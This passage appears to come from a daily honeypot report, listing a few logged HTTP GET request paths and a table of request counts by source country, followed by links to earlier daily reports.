10781GET /Odin/http/call1742990704 HTTP/1.1
11511GET /r3Jm HTTP/1.1
11521GET /oDBh HTTP/1.1
11631GET /odinhttpcall1742979336 HTTP/1.1
11641GET /OdinHttpCall1742979336 HTTP/1.1
11651GET /Odin/http/call1742979336 HTTP/1.1

country_iso_code
#

number of requests by source country (ip / country equivalence that request the honeypot) n

number_of_occurencecountry_iso_code
01627US
1828BG
2672FR
3529NL
4200CN
5151DE
6142GB
7131PL
880HK
961SG
1056JP
1155IN
1242RU
1339PT
1437ES
1536CH
1631SC
1726CA
1822NG
1915HR
2012LT
2112NO
2212BE
2312VE
2411UA
258MD
268KR
277GH
287AZ
296HU
306TR
316IE
325ZA
335SA
345IR
354IL
363VN
373AR
383IT
392GR
402AE
412BR
422ID
432MC
441CG
451EC
461CL
471EE
481MX
491AT
501PK
511TH
521PR
531AL

Related

Report: 2025-03-25
·553 words
Repport Daily
Report: 2025-03-24
·720 words
Repport Daily
Report: 2025-03-23
·2901 words
Repport Daily